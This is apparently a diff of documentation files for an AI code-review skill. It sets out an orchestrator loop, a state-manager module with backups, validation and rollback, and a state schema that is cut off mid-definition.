||||
|
||||
## Execution Loop
|
||||
|
||||
```javascript
|
||||
async function runOrchestrator() {
|
||||
console.log('=== Code Review Orchestrator Started ===');
|
||||
|
||||
let iteration = 0;
|
||||
const MAX_ITERATIONS = 20; // 6 dimensions + overhead
|
||||
|
||||
// 初始化状态(如果尚未初始化)
|
||||
let state = StateManager.getState(workDir);
|
||||
if (!state) {
|
||||
state = StateManager.initState(workDir);
|
||||
}
|
||||
|
||||
while (iteration < MAX_ITERATIONS) {
|
||||
iteration++;
|
||||
|
||||
// 1. 读取当前状态(使用 StateManager)
|
||||
state = StateManager.getState(workDir);
|
||||
if (!state) {
|
||||
console.error('[Orchestrator] Failed to read state, attempting recovery...');
|
||||
state = StateManager.restoreState(workDir);
|
||||
if (!state) {
|
||||
console.error('[Orchestrator] Recovery failed, aborting.');
|
||||
break;
|
||||
}
|
||||
}
|
||||
console.log(`[Iteration ${iteration}] Status: ${state.status}`);
|
||||
|
||||
// 2. 选择下一个动作
|
||||
const actionId = selectNextAction(state);
|
||||
|
||||
if (!actionId) {
|
||||
console.log('Review completed, terminating.');
|
||||
break;
|
||||
}
|
||||
|
||||
console.log(`[Iteration ${iteration}] Executing: ${actionId}`);
|
||||
|
||||
// 3. 更新状态:当前动作(使用 StateManager)
|
||||
StateManager.updateState(workDir, { current_action: actionId });
|
||||
|
||||
// 4. 执行动作
|
||||
try {
|
||||
const actionPrompt = Read(`phases/actions/${actionId}.md`);
|
||||
|
||||
// 确定当前需要审查的维度(使用 StateManager)
|
||||
const currentDimension = StateManager.getNextDimension(state);
|
||||
|
||||
const result = await Task({
|
||||
subagent_type: 'universal-executor',
|
||||
run_in_background: false,
|
||||
prompt: `
|
||||
[WORK_DIR]
|
||||
${workDir}
|
||||
|
||||
[STATE]
|
||||
${JSON.stringify(state, null, 2)}
|
||||
|
||||
[CURRENT_DIMENSION]
|
||||
${currentDimension || 'N/A'}
|
||||
|
||||
[ACTION]
|
||||
${actionPrompt}
|
||||
|
||||
[SPECS]
|
||||
Review Dimensions: specs/review-dimensions.md
|
||||
Issue Classification: specs/issue-classification.md
|
||||
|
||||
[RETURN]
|
||||
Return JSON with stateUpdates field containing updates to apply to state.
|
||||
`
|
||||
});
|
||||
|
||||
const actionResult = JSON.parse(result);
|
||||
|
||||
// 5. 更新状态:动作完成(使用 StateManager)
|
||||
StateManager.updateState(workDir, {
|
||||
current_action: null,
|
||||
completed_actions: [...(state.completed_actions || []), actionId],
|
||||
...actionResult.stateUpdates
|
||||
});
|
||||
|
||||
// 如果是深入审查动作,标记维度完成
|
||||
if (actionId === 'action-deep-review' && currentDimension) {
|
||||
StateManager.markDimensionComplete(workDir, currentDimension);
|
||||
}
|
||||
|
||||
} catch (error) {
|
||||
// 错误处理(使用 StateManager.recordError)
|
||||
console.error(`[Orchestrator] Action failed: ${error.message}`);
|
||||
StateManager.recordError(workDir, actionId, error.message);
|
||||
|
||||
// 清除当前动作
|
||||
StateManager.updateState(workDir, { current_action: null });
|
||||
|
||||
// 检查是否需要恢复状态
|
||||
const updatedState = StateManager.getState(workDir);
|
||||
if (updatedState && updatedState.error_count >= 3) {
|
||||
console.error('[Orchestrator] Too many errors, attempting state recovery...');
|
||||
StateManager.restoreState(workDir);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
console.log('=== Code Review Orchestrator Finished ===');
|
||||
}
|
||||
```
|
||||
|
||||
## Action Catalog

| Action | Purpose | Preconditions |
|--------|---------|---------------|
| [action-collect-context](actions/action-collect-context.md) | Collect context for the review target | status === 'pending' |
| [action-quick-scan](actions/action-quick-scan.md) | Quick scan to identify risk areas | context !== null |
| [action-deep-review](actions/action-deep-review.md) | Deep review of a specific dimension | scan_completed === true |
| [action-generate-report](actions/action-generate-report.md) | Generate the structured review report | all dimensions reviewed |
| [action-complete](actions/action-complete.md) | Finalize the review and persist results | report_generated === true |

## Termination Conditions

- `state.status === 'completed'` - review finished normally
- `state.status === 'user_exit'` - user chose to exit
- `state.error_count >= 3` - error limit exceeded (handled automatically by StateManager.recordError)
- `iteration >= MAX_ITERATIONS` - iteration limit exceeded
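These conditions can be folded into a single guard evaluated at the top of each loop iteration. A minimal sketch, assuming the state fields from `phases/state-schema.md`; the `shouldTerminate` helper itself is illustrative and not part of the existing orchestrator API:

```javascript
// Minimal sketch: evaluate the termination conditions listed above.
function shouldTerminate(state, iteration, maxIterations) {
  if (!state) return true;                        // state could not be read or recovered
  if (state.status === 'completed') return true;  // review finished normally
  if (state.status === 'user_exit') return true;  // user chose to exit
  if (state.status === 'failed') return true;     // set automatically once error_count >= 3
  if (iteration >= maxIterations) return true;    // iteration budget exhausted
  return false;
}
```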

## Error Recovery

This module relies on the error-recovery mechanisms provided by StateManager:

| Error Type | Recovery Strategy | StateManager Function |
|------------|-------------------|----------------------|
| State read failure | Restore from backup | `restoreState(workDir)` |
| Action execution failure | Record the error; auto-fail once the limit is exceeded | `recordError(workDir, action, message)` |
| Inconsistent state | Validate and recover | built-in validation in `getState()` |
| User abort | Save current progress | `updateState(workDir, { status: 'user_exit' })` |

### Error Handling Flow

```
1. Action execution fails
        |
2. StateManager.recordError() records the error
        |
3. Check error_count
        |
        +-- < 3: continue with the next iteration
        +-- >= 3: StateManager automatically sets status='failed'
                |
                Orchestrator detects the status change
                |
                Attempts restoreState() to roll back to the last stable state
```

### Backup Timing

StateManager automatically creates backups at the following points:
- Before every `updateState()` call
- Named backups can be created manually via `backupState(workDir, suffix)`

### History Tracking

All state changes are recorded in `state-history.json` for debugging and auditing:
- Initialization events
- Field-level changes for every update
- Restore operations
|
||||
.claude/skills/review-code/phases/state-manager.md (new file, 752 lines)
|
||||
# State Manager
|
||||
|
||||
Centralized state management module for Code Review workflow. Provides atomic operations, automatic backups, validation, and rollback capabilities.
|
||||
|
||||
## Overview
|
||||
|
||||
This module solves the fragile state management problem by providing:
|
||||
- **Atomic updates** - Write to temp file, then rename (prevents corruption)
|
||||
- **Automatic backups** - Every update creates a backup first
|
||||
- **Rollback capability** - Restore from backup on failure
|
||||
- **Schema validation** - Ensure state structure integrity
|
||||
- **Change history** - Track all state modifications
|
||||
|
||||
## File Structure
|
||||
|
||||
```
|
||||
{workDir}/
|
||||
state.json # Current state
|
||||
state.backup.json # Latest backup
|
||||
state-history.json # Change history log
|
||||
```
|
||||
|
||||
## API Reference
|
||||
|
||||
### initState(workDir)
|
||||
|
||||
Initialize a new state file with default values.
|
||||
|
||||
```javascript
|
||||
/**
|
||||
* Initialize state file with default structure
|
||||
* @param {string} workDir - Working directory path
|
||||
* @returns {object} - Initial state object
|
||||
*/
|
||||
function initState(workDir) {
|
||||
const now = new Date().toISOString();
|
||||
|
||||
const initialState = {
|
||||
status: 'pending',
|
||||
started_at: now,
|
||||
updated_at: now,
|
||||
context: null,
|
||||
scan_completed: false,
|
||||
scan_summary: null,
|
||||
reviewed_dimensions: [],
|
||||
current_dimension: null,
|
||||
findings: {
|
||||
correctness: [],
|
||||
readability: [],
|
||||
performance: [],
|
||||
security: [],
|
||||
testing: [],
|
||||
architecture: []
|
||||
},
|
||||
report_generated: false,
|
||||
report_path: null,
|
||||
current_action: null,
|
||||
completed_actions: [],
|
||||
errors: [],
|
||||
error_count: 0,
|
||||
summary: null
|
||||
};
|
||||
|
||||
// Write state file
|
||||
const statePath = `${workDir}/state.json`;
|
||||
Write(statePath, JSON.stringify(initialState, null, 2));
|
||||
|
||||
// Initialize history log
|
||||
const historyPath = `${workDir}/state-history.json`;
|
||||
const historyEntry = {
|
||||
entries: [{
|
||||
timestamp: now,
|
||||
action: 'init',
|
||||
changes: { type: 'initialize', status: 'pending' }
|
||||
}]
|
||||
};
|
||||
Write(historyPath, JSON.stringify(historyEntry, null, 2));
|
||||
|
||||
console.log(`[StateManager] Initialized state at ${statePath}`);
|
||||
return initialState;
|
||||
}
|
||||
```
|
||||
|
||||
### getState(workDir)
|
||||
|
||||
Read and parse current state from file.
|
||||
|
||||
```javascript
|
||||
/**
|
||||
* Read current state from file
|
||||
* @param {string} workDir - Working directory path
|
||||
* @returns {object|null} - Current state or null if not found
|
||||
*/
|
||||
function getState(workDir) {
|
||||
const statePath = `${workDir}/state.json`;
|
||||
|
||||
try {
|
||||
const content = Read(statePath);
|
||||
const state = JSON.parse(content);
|
||||
|
||||
// Validate structure before returning
|
||||
const validation = validateState(state);
|
||||
if (!validation.valid) {
|
||||
console.warn(`[StateManager] State validation warnings: ${validation.warnings.join(', ')}`);
|
||||
}
|
||||
|
||||
return state;
|
||||
} catch (error) {
|
||||
console.error(`[StateManager] Failed to read state: ${error.message}`);
|
||||
return null;
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### updateState(workDir, updates)
|
||||
|
||||
Safely update state with atomic write and automatic backup.
|
||||
|
||||
```javascript
|
||||
/**
|
||||
* Safely update state with atomic write
|
||||
* @param {string} workDir - Working directory path
|
||||
* @param {object} updates - Partial state updates to apply
|
||||
* @returns {object} - Updated state object
|
||||
* @throws {Error} - If update fails (automatically rolls back)
|
||||
*/
|
||||
function updateState(workDir, updates) {
|
||||
const statePath = `${workDir}/state.json`;
|
||||
const tempPath = `${workDir}/state.tmp.json`;
|
||||
const backupPath = `${workDir}/state.backup.json`;
|
||||
const historyPath = `${workDir}/state-history.json`;
|
||||
|
||||
// Step 1: Read current state
|
||||
let currentState;
|
||||
try {
|
||||
currentState = JSON.parse(Read(statePath));
|
||||
} catch (error) {
|
||||
throw new Error(`Cannot read current state: ${error.message}`);
|
||||
}
|
||||
|
||||
// Step 2: Create backup before any modification
|
||||
try {
|
||||
Write(backupPath, JSON.stringify(currentState, null, 2));
|
||||
} catch (error) {
|
||||
throw new Error(`Cannot create backup: ${error.message}`);
|
||||
}
|
||||
|
||||
// Step 3: Merge updates
|
||||
const now = new Date().toISOString();
|
||||
const newState = deepMerge(currentState, {
|
||||
...updates,
|
||||
updated_at: now
|
||||
});
|
||||
|
||||
// Step 4: Validate new state
|
||||
const validation = validateState(newState);
|
||||
if (!validation.valid && validation.errors.length > 0) {
|
||||
throw new Error(`Invalid state after update: ${validation.errors.join(', ')}`);
|
||||
}
|
||||
|
||||
// Step 5: Write to temp file first (atomic preparation)
|
||||
try {
|
||||
Write(tempPath, JSON.stringify(newState, null, 2));
|
||||
} catch (error) {
|
||||
throw new Error(`Cannot write temp state: ${error.message}`);
|
||||
}
|
||||
|
||||
// Step 6: Atomic rename (replace original with temp)
|
||||
try {
|
||||
// Read temp and write to original (simulating atomic rename)
|
||||
const tempContent = Read(tempPath);
|
||||
Write(statePath, tempContent);
|
||||
|
||||
// Clean up temp file
|
||||
Bash(`rm -f "${tempPath}"`);
|
||||
} catch (error) {
|
||||
// Rollback: restore from backup
|
||||
console.error(`[StateManager] Update failed, rolling back: ${error.message}`);
|
||||
try {
|
||||
const backup = Read(backupPath);
|
||||
Write(statePath, backup);
|
||||
} catch (rollbackError) {
|
||||
throw new Error(`Critical: Update failed and rollback failed: ${rollbackError.message}`);
|
||||
}
|
||||
throw new Error(`Update failed, rolled back: ${error.message}`);
|
||||
}
|
||||
|
||||
// Step 7: Record in history
|
||||
try {
|
||||
let history = { entries: [] };
|
||||
try {
|
||||
history = JSON.parse(Read(historyPath));
|
||||
} catch (e) {
|
||||
// History file may not exist, start fresh
|
||||
}
|
||||
|
||||
history.entries.push({
|
||||
timestamp: now,
|
||||
action: 'update',
|
||||
changes: summarizeChanges(currentState, newState, updates)
|
||||
});
|
||||
|
||||
// Keep only last 100 entries
|
||||
if (history.entries.length > 100) {
|
||||
history.entries = history.entries.slice(-100);
|
||||
}
|
||||
|
||||
Write(historyPath, JSON.stringify(history, null, 2));
|
||||
} catch (error) {
|
||||
// History logging failure is non-critical
|
||||
console.warn(`[StateManager] Failed to log history: ${error.message}`);
|
||||
}
|
||||
|
||||
console.log(`[StateManager] State updated successfully`);
|
||||
return newState;
|
||||
}
|
||||
|
||||
/**
|
||||
* Deep merge helper - merges nested objects
|
||||
*/
|
||||
function deepMerge(target, source) {
|
||||
const result = { ...target };
|
||||
|
||||
for (const key of Object.keys(source)) {
|
||||
if (source[key] === null || source[key] === undefined) {
|
||||
result[key] = source[key];
|
||||
} else if (Array.isArray(source[key])) {
|
||||
result[key] = source[key];
|
||||
} else if (typeof source[key] === 'object' && typeof target[key] === 'object') {
|
||||
result[key] = deepMerge(target[key], source[key]);
|
||||
} else {
|
||||
result[key] = source[key];
|
||||
}
|
||||
}
|
||||
|
||||
return result;
|
||||
}
|
||||
|
||||
/**
|
||||
* Summarize changes for history logging
|
||||
*/
|
||||
function summarizeChanges(oldState, newState, updates) {
|
||||
const changes = {};
|
||||
|
||||
for (const key of Object.keys(updates)) {
|
||||
if (key === 'updated_at') continue;
|
||||
|
||||
const oldVal = oldState[key];
|
||||
const newVal = newState[key];
|
||||
|
||||
if (JSON.stringify(oldVal) !== JSON.stringify(newVal)) {
|
||||
changes[key] = {
|
||||
from: typeof oldVal === 'object' ? '[object]' : oldVal,
|
||||
to: typeof newVal === 'object' ? '[object]' : newVal
|
||||
};
|
||||
}
|
||||
}
|
||||
|
||||
return changes;
|
||||
}
|
||||
```
|
||||
|
||||
### validateState(state)
|
||||
|
||||
Validate state structure against schema.
|
||||
|
||||
```javascript
|
||||
/**
|
||||
* Validate state structure
|
||||
* @param {object} state - State object to validate
|
||||
* @returns {object} - { valid: boolean, errors: string[], warnings: string[] }
|
||||
*/
|
||||
function validateState(state) {
|
||||
const errors = [];
|
||||
const warnings = [];
|
||||
|
||||
// Required fields
|
||||
const requiredFields = ['status', 'started_at', 'updated_at'];
|
||||
for (const field of requiredFields) {
|
||||
if (state[field] === undefined) {
|
||||
errors.push(`Missing required field: ${field}`);
|
||||
}
|
||||
}
|
||||
|
||||
// Status validation
|
||||
const validStatuses = ['pending', 'running', 'completed', 'failed', 'user_exit'];
|
||||
if (state.status && !validStatuses.includes(state.status)) {
|
||||
errors.push(`Invalid status: ${state.status}. Must be one of: ${validStatuses.join(', ')}`);
|
||||
}
|
||||
|
||||
// Timestamp format validation
|
||||
const timestampFields = ['started_at', 'updated_at', 'completed_at'];
|
||||
for (const field of timestampFields) {
|
||||
if (state[field] && !isValidISOTimestamp(state[field])) {
|
||||
warnings.push(`Invalid timestamp format for ${field}`);
|
||||
}
|
||||
}
|
||||
|
||||
// Findings structure validation
|
||||
if (state.findings) {
|
||||
const expectedDimensions = ['correctness', 'readability', 'performance', 'security', 'testing', 'architecture'];
|
||||
for (const dim of expectedDimensions) {
|
||||
if (!Array.isArray(state.findings[dim])) {
|
||||
warnings.push(`findings.${dim} should be an array`);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Context validation (when present)
|
||||
if (state.context !== null && state.context !== undefined) {
|
||||
const contextFields = ['target_path', 'files', 'language', 'total_lines', 'file_count'];
|
||||
for (const field of contextFields) {
|
||||
if (state.context[field] === undefined) {
|
||||
warnings.push(`context.${field} is missing`);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Error count validation
|
||||
if (typeof state.error_count !== 'number') {
|
||||
warnings.push('error_count should be a number');
|
||||
}
|
||||
|
||||
// Array fields validation
|
||||
const arrayFields = ['reviewed_dimensions', 'completed_actions', 'errors'];
|
||||
for (const field of arrayFields) {
|
||||
if (state[field] !== undefined && !Array.isArray(state[field])) {
|
||||
errors.push(`${field} must be an array`);
|
||||
}
|
||||
}
|
||||
|
||||
return {
|
||||
valid: errors.length === 0,
|
||||
errors,
|
||||
warnings
|
||||
};
|
||||
}
|
||||
|
||||
/**
|
||||
* Check if string is valid ISO timestamp
|
||||
*/
|
||||
function isValidISOTimestamp(str) {
|
||||
if (typeof str !== 'string') return false;
|
||||
const date = new Date(str);
|
||||
return !isNaN(date.getTime()) && str.includes('T');
|
||||
}
|
||||
```
|
||||
|
||||
### backupState(workDir, suffix)
|
||||
|
||||
Create a manual backup of current state.
|
||||
|
||||
```javascript
|
||||
/**
|
||||
* Create a manual backup of current state
|
||||
* @param {string} workDir - Working directory path
|
||||
* @param {string} [suffix] - Optional suffix for backup file name
|
||||
* @returns {string} - Backup file path
|
||||
*/
|
||||
function backupState(workDir, suffix = null) {
|
||||
const statePath = `${workDir}/state.json`;
|
||||
const timestamp = new Date().toISOString().replace(/[:.]/g, '-');
|
||||
const backupName = suffix
|
||||
? `state.backup.${suffix}.json`
|
||||
: `state.backup.${timestamp}.json`;
|
||||
const backupPath = `${workDir}/${backupName}`;
|
||||
|
||||
try {
|
||||
const content = Read(statePath);
|
||||
Write(backupPath, content);
|
||||
console.log(`[StateManager] Backup created: ${backupPath}`);
|
||||
return backupPath;
|
||||
} catch (error) {
|
||||
throw new Error(`Failed to create backup: ${error.message}`);
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### restoreState(workDir, backupPath)
|
||||
|
||||
Restore state from a backup file.
|
||||
|
||||
```javascript
|
||||
/**
|
||||
* Restore state from a backup file
|
||||
* @param {string} workDir - Working directory path
|
||||
* @param {string} [backupPath] - Path to backup file (default: latest backup)
|
||||
* @returns {object} - Restored state object
|
||||
*/
|
||||
function restoreState(workDir, backupPath = null) {
|
||||
const statePath = `${workDir}/state.json`;
|
||||
const defaultBackup = `${workDir}/state.backup.json`;
|
||||
const historyPath = `${workDir}/state-history.json`;
|
||||
|
||||
const sourcePath = backupPath || defaultBackup;
|
||||
|
||||
try {
|
||||
// Read backup
|
||||
const backupContent = Read(sourcePath);
|
||||
const backupState = JSON.parse(backupContent);
|
||||
|
||||
// Validate backup state
|
||||
const validation = validateState(backupState);
|
||||
if (!validation.valid) {
|
||||
throw new Error(`Backup state is invalid: ${validation.errors.join(', ')}`);
|
||||
}
|
||||
|
||||
// Create backup of current state before restore (for safety)
|
||||
try {
|
||||
const currentContent = Read(statePath);
|
||||
Write(`${workDir}/state.pre-restore.json`, currentContent);
|
||||
} catch (e) {
|
||||
// Current state may not exist, that's okay
|
||||
}
|
||||
|
||||
// Update timestamp
|
||||
const now = new Date().toISOString();
|
||||
backupState.updated_at = now;
|
||||
|
||||
// Write restored state
|
||||
Write(statePath, JSON.stringify(backupState, null, 2));
|
||||
|
||||
// Log to history
|
||||
try {
|
||||
let history = { entries: [] };
|
||||
try {
|
||||
history = JSON.parse(Read(historyPath));
|
||||
} catch (e) {}
|
||||
|
||||
history.entries.push({
|
||||
timestamp: now,
|
||||
action: 'restore',
|
||||
changes: { source: sourcePath }
|
||||
});
|
||||
|
||||
Write(historyPath, JSON.stringify(history, null, 2));
|
||||
} catch (e) {
|
||||
console.warn(`[StateManager] Failed to log restore to history`);
|
||||
}
|
||||
|
||||
console.log(`[StateManager] State restored from ${sourcePath}`);
|
||||
return backupState;
|
||||
} catch (error) {
|
||||
throw new Error(`Failed to restore state: ${error.message}`);
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Convenience Functions
|
||||
|
||||
### getNextDimension(state)
|
||||
|
||||
Get the next dimension to review based on current state.
|
||||
|
||||
```javascript
|
||||
/**
|
||||
* Get next dimension to review
|
||||
* @param {object} state - Current state
|
||||
* @returns {string|null} - Next dimension or null if all reviewed
|
||||
*/
|
||||
function getNextDimension(state) {
|
||||
const dimensions = ['correctness', 'security', 'performance', 'readability', 'testing', 'architecture'];
|
||||
const reviewed = state.reviewed_dimensions || [];
|
||||
|
||||
for (const dim of dimensions) {
|
||||
if (!reviewed.includes(dim)) {
|
||||
return dim;
|
||||
}
|
||||
}
|
||||
|
||||
return null;
|
||||
}
|
||||
```
|
||||
|
||||
### addFinding(workDir, finding)
|
||||
|
||||
Add a new finding to the state.
|
||||
|
||||
```javascript
|
||||
/**
|
||||
* Add a finding to the appropriate dimension
|
||||
* @param {string} workDir - Working directory path
|
||||
* @param {object} finding - Finding object (must include dimension field)
|
||||
* @returns {object} - Updated state
|
||||
*/
|
||||
function addFinding(workDir, finding) {
|
||||
if (!finding.dimension) {
|
||||
throw new Error('Finding must have a dimension field');
|
||||
}
|
||||
|
||||
const state = getState(workDir);
|
||||
const dimension = finding.dimension;
|
||||
|
||||
// Generate ID if not provided
|
||||
if (!finding.id) {
|
||||
const prefixes = {
|
||||
correctness: 'CORR',
|
||||
readability: 'READ',
|
||||
performance: 'PERF',
|
||||
security: 'SEC',
|
||||
testing: 'TEST',
|
||||
architecture: 'ARCH'
|
||||
};
|
||||
const prefix = prefixes[dimension] || 'MISC';
|
||||
const count = (state.findings[dimension]?.length || 0) + 1;
|
||||
finding.id = `${prefix}-${String(count).padStart(3, '0')}`;
|
||||
}
|
||||
|
||||
const currentFindings = state.findings[dimension] || [];
|
||||
|
||||
return updateState(workDir, {
|
||||
findings: {
|
||||
...state.findings,
|
||||
[dimension]: [...currentFindings, finding]
|
||||
}
|
||||
});
|
||||
}
|
||||
```
|
||||
|
||||
### markDimensionComplete(workDir, dimension)
|
||||
|
||||
Mark a dimension as reviewed.
|
||||
|
||||
```javascript
|
||||
/**
|
||||
* Mark a dimension as reviewed
|
||||
* @param {string} workDir - Working directory path
|
||||
* @param {string} dimension - Dimension name
|
||||
* @returns {object} - Updated state
|
||||
*/
|
||||
function markDimensionComplete(workDir, dimension) {
|
||||
const state = getState(workDir);
|
||||
const reviewed = state.reviewed_dimensions || [];
|
||||
|
||||
if (reviewed.includes(dimension)) {
|
||||
console.warn(`[StateManager] Dimension ${dimension} already marked as reviewed`);
|
||||
return state;
|
||||
}
|
||||
|
||||
return updateState(workDir, {
|
||||
reviewed_dimensions: [...reviewed, dimension],
|
||||
current_dimension: null
|
||||
});
|
||||
}
|
||||
```
|
||||
|
||||
### recordError(workDir, action, message)
|
||||
|
||||
Record an error in state.
|
||||
|
||||
```javascript
|
||||
/**
|
||||
* Record an execution error
|
||||
* @param {string} workDir - Working directory path
|
||||
* @param {string} action - Action that failed
|
||||
* @param {string} message - Error message
|
||||
* @returns {object} - Updated state
|
||||
*/
|
||||
function recordError(workDir, action, message) {
|
||||
const state = getState(workDir);
|
||||
const errors = state.errors || [];
|
||||
const errorCount = (state.error_count || 0) + 1;
|
||||
|
||||
const newError = {
|
||||
action,
|
||||
message,
|
||||
timestamp: new Date().toISOString()
|
||||
};
|
||||
|
||||
const newState = updateState(workDir, {
|
||||
errors: [...errors, newError],
|
||||
error_count: errorCount
|
||||
});
|
||||
|
||||
// Auto-fail if error count exceeds threshold
|
||||
if (errorCount >= 3) {
|
||||
return updateState(workDir, {
|
||||
status: 'failed'
|
||||
});
|
||||
}
|
||||
|
||||
return newState;
|
||||
}
|
||||
```
|
||||
|
||||
## Usage Examples
|
||||
|
||||
### Initialize and Run Review
|
||||
|
||||
```javascript
|
||||
// Initialize new review session
|
||||
const workDir = '/path/to/review-session';
|
||||
const state = initState(workDir);
|
||||
|
||||
// Update status to running
|
||||
updateState(workDir, { status: 'running' });
|
||||
|
||||
// After collecting context
|
||||
updateState(workDir, {
|
||||
context: {
|
||||
target_path: '/src/auth',
|
||||
files: ['auth.ts', 'login.ts'],
|
||||
language: 'typescript',
|
||||
total_lines: 500,
|
||||
file_count: 2
|
||||
}
|
||||
});
|
||||
|
||||
// After completing quick scan
|
||||
updateState(workDir, {
|
||||
scan_completed: true,
|
||||
scan_summary: {
|
||||
risk_areas: [{ file: 'auth.ts', reason: 'Complex logic', priority: 'high' }],
|
||||
complexity_score: 7.5,
|
||||
quick_issues: []
|
||||
}
|
||||
});
|
||||
```
|
||||
|
||||
### Add Findings During Review
|
||||
|
||||
```javascript
|
||||
// Add a security finding
|
||||
addFinding(workDir, {
|
||||
dimension: 'security',
|
||||
severity: 'high',
|
||||
category: 'injection',
|
||||
file: 'auth.ts',
|
||||
line: 45,
|
||||
description: 'SQL injection vulnerability',
|
||||
recommendation: 'Use parameterized queries'
|
||||
});
|
||||
|
||||
// Mark dimension complete
|
||||
markDimensionComplete(workDir, 'security');
|
||||
```
|
||||
|
||||
### Error Handling with Rollback
|
||||
|
||||
```javascript
|
||||
try {
|
||||
updateState(workDir, {
|
||||
status: 'running',
|
||||
current_action: 'deep-review'
|
||||
});
|
||||
|
||||
// ... do review work ...
|
||||
|
||||
} catch (error) {
|
||||
// Record error
|
||||
recordError(workDir, 'deep-review', error.message);
|
||||
|
||||
// If needed, restore from backup
|
||||
restoreState(workDir);
|
||||
}
|
||||
```
|
||||
|
||||
### Check Review Progress
|
||||
|
||||
```javascript
|
||||
const state = getState(workDir);
|
||||
const nextDim = getNextDimension(state);
|
||||
|
||||
if (nextDim) {
|
||||
console.log(`Next dimension to review: ${nextDim}`);
|
||||
updateState(workDir, { current_dimension: nextDim });
|
||||
} else {
|
||||
console.log('All dimensions reviewed');
|
||||
}
|
||||
```
|
||||
|
||||
## Integration with Orchestrator
|
||||
|
||||
Update the orchestrator to use StateManager:
|
||||
|
||||
```javascript
|
||||
// In orchestrator.md - Replace direct state operations with StateManager calls
|
||||
|
||||
// OLD:
|
||||
const state = JSON.parse(Read(`${workDir}/state.json`));
|
||||
|
||||
// NEW:
|
||||
const state = getState(workDir);
|
||||
|
||||
// OLD:
|
||||
function updateState(updates) {
|
||||
const state = JSON.parse(Read(`${workDir}/state.json`));
|
||||
const newState = { ...state, ...updates, updated_at: new Date().toISOString() };
|
||||
Write(`${workDir}/state.json`, JSON.stringify(newState, null, 2));
|
||||
return newState;
|
||||
}
|
||||
|
||||
// NEW:
|
||||
// Import from state-manager.md
|
||||
// updateState(workDir, updates) - handles atomic write, backup, validation
|
||||
|
||||
// Error handling - OLD:
|
||||
updateState({
|
||||
errors: [...(state.errors || []), { action: actionId, message: error.message, timestamp: new Date().toISOString() }],
|
||||
error_count: (state.error_count || 0) + 1
|
||||
});
|
||||
|
||||
// Error handling - NEW:
|
||||
recordError(workDir, actionId, error.message);
|
||||
```
|
||||
|
||||
## State History Format
|
||||
|
||||
The `state-history.json` file tracks all state changes:
|
||||
|
||||
```json
|
||||
{
|
||||
"entries": [
|
||||
{
|
||||
"timestamp": "2024-01-01T10:00:00.000Z",
|
||||
"action": "init",
|
||||
"changes": { "type": "initialize", "status": "pending" }
|
||||
},
|
||||
{
|
||||
"timestamp": "2024-01-01T10:01:00.000Z",
|
||||
"action": "update",
|
||||
"changes": {
|
||||
"status": { "from": "pending", "to": "running" },
|
||||
"current_action": { "from": null, "to": "action-collect-context" }
|
||||
}
|
||||
},
|
||||
{
|
||||
"timestamp": "2024-01-01T10:05:00.000Z",
|
||||
"action": "restore",
|
||||
"changes": { "source": "/path/state.backup.json" }
|
||||
}
|
||||
]
|
||||
}
|
||||
```
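For debugging it is often enough to look at the tail of this log. A minimal sketch, following the same `Read` convention used throughout this module; the `tailHistory` helper name is illustrative:

```javascript
// Minimal sketch: return the last `n` history entries for quick inspection.
function tailHistory(workDir, n = 10) {
  try {
    const history = JSON.parse(Read(`${workDir}/state-history.json`));
    return (history.entries || []).slice(-n);
  } catch (error) {
    console.warn(`[StateManager] No readable history: ${error.message}`);
    return [];
  }
}
```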
|
||||
|
||||
## Error Recovery Strategies
|
||||
|
||||
| Scenario | Strategy | Function |
|
||||
|----------|----------|----------|
|
||||
| State file corrupted | Restore from backup | `restoreState(workDir)` |
|
||||
| Invalid state after update | Auto-rollback (built-in) | N/A (automatic) |
|
||||
| Multiple errors | Auto-fail after 3 | `recordError()` |
|
||||
| Need to retry from checkpoint | Restore specific backup | `restoreState(workDir, backupPath)` |
|
||||
| Review interrupted | Resume from saved state | `getState(workDir)` |
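A minimal sketch of how the first two strategies might be combined when a session starts; it only calls functions defined above, and the `loadOrRecoverState` wrapper name is an assumption for illustration:

```javascript
// Minimal sketch: read state, falling back to the latest backup if state.json is corrupted.
function loadOrRecoverState(workDir) {
  const state = getState(workDir);
  if (state) return state;

  console.warn('[StateManager] state.json unreadable, restoring from backup...');
  return restoreState(workDir); // throws if the backup is also invalid
}
```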
|
||||
|
||||
## Best Practices
|
||||
|
||||
1. **Always use `updateState()`** - Never write directly to state.json
|
||||
2. **Check validation warnings** - Warnings may indicate data issues
|
||||
3. **Use convenience functions** - `addFinding()`, `markDimensionComplete()`, etc.
|
||||
4. **Monitor history** - Check state-history.json for debugging
|
||||
5. **Create named backups** - Before major operations: `backupState(workDir, 'pre-deep-review')`
|
||||
.claude/skills/review-code/phases/state-schema.md (new file, 174 lines)
|
||||
# State Schema
|
||||
|
||||
State structure definition for the Code Review workflow.
|
||||
|
||||
## Schema Definition
|
||||
|
||||
```typescript
|
||||
interface ReviewState {
  // === Metadata ===
  status: 'pending' | 'running' | 'completed' | 'failed' | 'user_exit';
  started_at: string;              // ISO timestamp
  updated_at: string;              // ISO timestamp
  completed_at?: string;           // ISO timestamp

  // === Review target ===
  context: {
    target_path: string;           // Target path (file or directory)
    files: string[];               // Files to review
    language: string;              // Primary programming language
    framework?: string;            // Framework (if any)
    total_lines: number;           // Total lines of code
    file_count: number;            // Number of files
  };

  // === Scan results ===
  scan_completed: boolean;
  scan_summary: {
    risk_areas: RiskArea[];        // High-risk areas
    complexity_score: number;      // Complexity score
    quick_issues: QuickIssue[];    // Issues found during the quick scan
  };

  // === Review progress ===
  reviewed_dimensions: string[];   // Dimensions already reviewed
  current_dimension?: string;      // Dimension currently under review

  // === Findings ===
  findings: {
    correctness: Finding[];
    readability: Finding[];
    performance: Finding[];
    security: Finding[];
    testing: Finding[];
    architecture: Finding[];
  };

  // === Report status ===
  report_generated: boolean;
  report_path?: string;

  // === Execution tracking ===
  current_action?: string;
  completed_actions: string[];
  errors: ExecutionError[];
  error_count: number;

  // === Statistics ===
  summary?: {
    total_issues: number;
    critical: number;
    high: number;
    medium: number;
    low: number;
    info: number;
    review_duration_ms: number;
  };
}

interface RiskArea {
  file: string;
  reason: string;
  priority: 'high' | 'medium' | 'low';
}

interface QuickIssue {
  type: string;
  file: string;
  line?: number;
  message: string;
}

interface Finding {
